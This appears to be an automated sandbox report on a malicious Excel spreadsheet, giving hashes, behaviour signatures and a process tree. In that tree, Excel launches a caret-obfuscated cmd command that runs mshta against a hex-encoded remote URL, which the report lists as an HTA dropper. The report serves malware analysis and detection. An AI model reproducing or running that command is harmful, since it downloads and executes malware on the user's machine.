Analysis

  • max time kernel
    139s
  • max time network
    141s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 15:47

General

  • Target

    edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls

  • Size

    142KB

  • MD5

    81f0a7a1ad8bf108c2648af767e77fcd

  • SHA1

    9575d97617b4d5b9c22f5d2a0fbfbd3de1ad3de4

  • SHA256

    edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878

  • SHA512

    6ed134fd7cba8ddd3c195f5e31a1ce996b8bc5403933a47a23666b483720eb140ca7a8ba5fda71961ef5c7125e9a5b5575f60fb57d3c48879df75bb1980c5967

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fer.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\edefd18d0580d8d25297bcddc843c3478c20f650b124224460ca9ae267529878.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3152
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:3640
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2172
        • C:\Windows\system32\mshta.exe
          mshta http://0xb907d607/fer/fer.html
          3⤵
          • Blocklisted process makes network request
          PID:3280

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3152-115-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-116-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-117-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-118-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-119-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-128-0x00007FF86CD00000-0x00007FF86CD10000-memory.dmp

      Filesize

      64KB

    • memory/3152-129-0x00007FF86CD00000-0x00007FF86CD10000-memory.dmp

      Filesize

      64KB

    • memory/3152-298-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-299-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-300-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB

    • memory/3152-301-0x00007FF86FB00000-0x00007FF86FB10000-memory.dmp

      Filesize

      64KB